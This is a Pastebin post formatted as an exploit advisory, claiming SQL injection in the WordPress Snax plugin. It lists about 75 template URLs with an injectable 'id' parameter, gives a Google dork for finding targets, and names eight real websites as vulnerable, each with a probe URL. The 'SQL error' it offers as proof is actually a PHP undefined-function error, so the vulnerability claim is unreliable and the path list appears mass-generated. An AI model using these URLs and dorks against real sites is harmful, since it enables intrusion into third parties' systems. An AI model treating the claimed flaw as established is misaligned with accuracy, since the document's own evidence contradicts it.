KingSkrupellos

WordPress Snax Plugins 4.9.x SQL Injection

Jan 27th, 2019
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.33 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress Snax Plugins 4.9.x SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/01/2019
  7. # Vendor Homepage : snax.bringthepixel.com
  8. # Software Information Link : codecanyon.net/item/snax-viral-frontend-uploader/16540363
  9. # Software Version : 4.9.x and other previous versions
  10. # Software Price : 30$
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/snax/templates/''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17.  
  18. ####################################################################
  19.  
  20. # Description :
  21. *************
  22.  
  23. Snax Viral Content Builder by bringthepixel lets site visitors (frontend) and editors (backend)
  24.  
  25. create quizzes, polls, lists, memes and other viral content.
  26.  
  27. ####################################################################
  28.  
  29. # Impact :
  30. **********
  31.  
  32. * WordPress Snax Plugin for WordPress 4.9.x and other versions is prone to an
  33.  
  34. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  35.  
  36. data before using it in an SQL query.
  37.  
  38. * Exploiting this issue could allow an attacker to compromise the application, read,
  39.  
  40. access or modify data, or exploit latent vulnerabilities in the underlying database.
  41.  
  42. If the webserver is misconfigured, read & write access to the filesystem may be possible.
  43.  
  44. ####################################################################
  45.  
  46. # SQL Injection Exploit :
  47. **************************
  48.  
  49. /wp-content/plugins/snax/templates/amp/content-gallery.php?id=[SQL Injection]
  50.  
  51. /wp-content/plugins/snax/templates/amp/content-list.php?id=[SQL Injection]
  52.  
  53. /wp-content/plugins/snax/templates/amp/content.php?id=[SQL Injection]
  54.  
  55. /wp-content/plugins/snax/templates/buddypress/items/loop-items.php?id=[SQL Injection]
  56.  
  57. /wp-content/plugins/snax/templates/buddypress/items/pagination-bottom.php?id=[SQL Injection]
  58.  
  59. /wp-content/plugins/snax/templates/buddypress/items/pagination.php?id=[SQL Injection]
  60.  
  61. /wp-content/plugins/snax/templates/buddypress/items/section-approved.php?id=[SQL Injection]
  62.  
  63. /wp-content/plugins/snax/templates/buddypress/items/section-pending.php?id=[SQL Injection]
  64.  
  65. /wp-content/plugins/snax/templates/buddypress/posts/loop-posts.php?id=[SQL Injection]
  66.  
  67. /wp-content/plugins/snax/templates/buddypress/posts/pagination-bottom.php?id=[SQL Injection]
  68.  
  69. /wp-content/plugins/snax/templates/buddypress/posts/pagination.php?id=[SQL Injection]
  70.  
  71. /wp-content/plugins/snax/templates/buddypress/posts/section-approved.php?id=[SQL Injection]
  72.  
  73. /wp-content/plugins/snax/templates/buddypress/posts/section-draft.php?id=[SQL Injection]
  74.  
  75. /wp-content/plugins/snax/templates/buddypress/posts/section-pending.php?id=[SQL Injection]
  76.  
  77. /wp-content/plugins/snax/templates/buddypress/votes/loop-vote.php?id=[SQL Injection]
  78.  
  79. /wp-content/plugins/snax/templates/buddypress/votes/loop-votes.php?id=[SQL Injection]
  80.  
  81. /wp-content/plugins/snax/templates/buddypress/votes/pagination-bottom.php?id=[SQL Injection]
  82.  
  83. /wp-content/plugins/snax/templates/buddypress/votes/pagination.php?id=[SQL Injection]
  84.  
  85. /wp-content/plugins/snax/templates/buddypress/votes/section-downvotes.php?id=[SQL Injection]
  86.  
  87. /wp-content/plugins/snax/templates/buddypress/votes/section-upvotes.php?id=[SQL Injection]
  88.  
  89. /wp-content/plugins/snax/templates/content.php?id=[SQL Injection]
  90.  
  91. /wp-content/plugins/snax/templates/demo/form-embed.php?id=[SQL Injection]
  92.  
  93. /wp-content/plugins/snax/templates/demo/form-gallery.php?id=[SQL Injection]
  94.  
  95. /wp-content/plugins/snax/templates/demo/form-image.php?id=[SQL Injection]
  96.  
  97. /wp-content/plugins/snax/templates/demo/form-list.php?id=[SQL Injection]
  98.  
  99. /wp-content/plugins/snax/templates/demo/form-meme.php?id=[SQL Injection]
  100.  
  101. /wp-content/plugins/snax/templates/fb-instant-articles/content-list.php?id=[SQL Injection]
  102.  
  103. /wp-content/plugins/snax/templates/items/form-edit/row-description.php?id=[SQL Injection]
  104.  
  105. /wp-content/plugins/snax/templates/items/form-edit/row-legal.php?id=[SQL Injection]
  106.  
  107. /wp-content/plugins/snax/templates/items/form-edit/row-referral.php?id=[SQL Injection]
  108.  
  109. /wp-content/plugins/snax/templates/items/form-edit/row-source.php?id=[SQL Injection]
  110.  
  111. /wp-content/plugins/snax/templates/items/form-edit/row-title.php?id=[SQL Injection]
  112.  
  113. /wp-content/plugins/snax/templates/items/form-new-audio.php?id=[SQL Injection]
  114.  
  115. /wp-content/plugins/snax/templates/items/form-new-embed.php?id=[SQL Injection]
  116.  
  117. /wp-content/plugins/snax/templates/items/form-new-image.php?id=[SQL Injection]
  118.  
  119. /wp-content/plugins/snax/templates/items/form-new-text.php?id=[SQL Injection]
  120.  
  121. /wp-content/plugins/snax/templates/items/form-new-video.php?id=[SQL Injection]
  122.  
  123. /wp-content/plugins/snax/templates/items/form-new.php?id=[SQL Injection]
  124.  
  125. /wp-content/plugins/snax/templates/items/nav.php?id=[SQL Injection]
  126.  
  127. /wp-content/plugins/snax/templates/items/note.php?id=[SQL Injection]
  128.  
  129. /wp-content/plugins/snax/templates/pages/about.php?id=[SQL Injection]
  130.  
  131. /wp-content/plugins/snax/templates/polls/content-answer.php?id=[SQL Injection]
  132.  
  133. /wp-content/plugins/snax/templates/polls/content-question.php?id=[SQL Injection]
  134.  
  135. /wp-content/plugins/snax/templates/polls/loop-answers.php?id=[SQL Injection]
  136.  
  137. /wp-content/plugins/snax/templates/polls/loop-questions.php?id=[SQL Injection]
  138.  
  139. /wp-content/plugins/snax/templates/polls/pagination.php?id=[SQL Injection]
  140.  
  141. /wp-content/plugins/snax/templates/polls/poll.php?id=[SQL Injection]
  142.  
  143. /wp-content/plugins/snax/templates/polls/progress-coins.php?id=[SQL Injection]
  144.  
  145. /wp-content/plugins/snax/templates/posts/content-gallery.php?id=[SQL Injection]
  146.  
  147. /wp-content/plugins/snax/templates/posts/content-list.php?id=[SQL Injection]
  148.  
  149. /wp-content/plugins/snax/templates/posts/content.php?id=[SQL Injection]
  150.  
  151. /wp-content/plugins/snax/templates/posts/note.php?id=[SQL Injection]
  152.  
  153. /wp-content/plugins/snax/templates/posts/origin.php?id=[SQL Injection]
  154.  
  155. /wp-content/plugins/snax/templates/posts/voting-box.php?id=[SQL Injection]
  156.  
  157. /wp-content/plugins/snax/templates/posts/form-edit/row-actions.php?id=[SQL Injection]
  158.  
  159. /wp-content/plugins/snax/templates/posts/form-edit/row-categories.php?id=[SQL Injection]
  160.  
  161. /wp-content/plugins/snax/templates/posts/form-edit/row-description.php?id=[SQL Injection]
  162.  
  163. /wp-content/plugins/snax/templates/posts/form-edit/row-draft-actions.php?id=[SQL Injection]
  164.  
  165. /wp-content/plugins/snax/templates/posts/form-edit/row-featured-image.php?id=[SQL Injection]
  166.  
  167. /wp-content/plugins/snax/templates/posts/form-edit/row-legal.php?id=[SQL Injection]
  168.  
  169. /wp-content/plugins/snax/templates/posts/form-edit/row-list-options.php?id=[SQL Injection]
  170.  
  171. /wp-content/plugins/snax/templates/posts/form-edit/row-referral.php?id=[SQL Injection]
  172.  
  173. /wp-content/plugins/snax/templates/posts/form-edit/row-source.php?id=[SQL Injection]
  174.  
  175. /wp-content/plugins/snax/templates/posts/form-edit/row-tags.php?id=[SQL Injection]
  176.  
  177. /wp-content/plugins/snax/templates/quizzes/actions-end.php?id=[SQL Injection]
  178.  
  179. /wp-content/plugins/snax/templates/quizzes/actions-start.php?id=[SQL Injection]
  180.  
  181. /wp-content/plugins/snax/templates/quizzes/content-answer.php?id=[SQL Injection]
  182.  
  183. /wp-content/plugins/snax/templates/quizzes/content-question.php?id=[SQL Injection]
  184.  
  185. /wp-content/plugins/snax/templates/quizzes/intro.php?id=[SQL Injection]
  186.  
  187. /wp-content/plugins/snax/templates/quizzes/loop-answers.php?id=[SQL Injection]
  188.  
  189. /wp-content/plugins/snax/templates/quizzes/loop-questions.php?id=[SQL Injection]
  190.  
  191. /wp-content/plugins/snax/templates/quizzes/pagination.php?id=[SQL Injection]
  192.  
  193. /wp-content/plugins/snax/templates/quizzes/progress-coins.php?id=[SQL Injection]
  194.  
  195. /wp-content/plugins/snax/templates/widget-call-to-action.php?id=[SQL Injection]
  196.  
  197. /wp-content/plugins/snax/templates/widget-teaser/poll-binary.php?id=[SQL Injection]
  198.  
  199. /wp-content/plugins/snax/templates/widget-teaser/poll-versus.php?id=[SQL Injection]
  200.  
  201. ####################################################################
  202.  
  203. # Example Vulnerable Sites :
  204. *************************
  205.  
  206. [+] universopop.com.br/wp-content/plugins/snax/templates/widget-call-to-action.php?id=1%27
  207.  
  208. [+] ongelofelijk.eu/wp-content/plugins/snax/templates/items/nav.php?id=1%27
  209.  
  210. [+] ekler.mk/wp-content/plugins/snax/templates/items/nav.php?id=1%27
  211.  
  212. [+] almosari3.info/wp-content/plugins/snax/templates/items/nav.php?id=1%27
  213.  
  214. [+] topfivebuzz.com/wp-content/plugins/snax/templates/items/nav.php?id=1%27
  215.  
  216. [+] pokestgo.cl/wp-content/plugins/snax/templates/items/nav.php?id=1%27
  217.  
  218. [+] js.pl/wp-content/plugins/snax/templates/items/nav.php?id=1%27
  219.  
  220. [+] yoogbe.com/wp-content/plugins/snax/templates/items/nav.php?id=1%27
  221.  
  222. ####################################################################
  223.  
  224. # Example SQL Database Error :
  225. ****************************
  226.  
  227. Fatal error: Uncaught Error: Call to undefined function
  228. snax_get_frontend_submission_page_url() in /home/unive684/public_html
  229. /wp-content/plugins/snax/templates/widget-call-to-action.php:8 Stack trace:
  230. #0 {main} thrown in /home/unive684/public_html/wp-content/plugins
  231. /snax/templates/widget-call-to-action.php on line 8
  232.  
  233. ####################################################################
  234.  
  235. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  236.  
  237. ####################################################################
Add Comment
Please, Sign In to add comment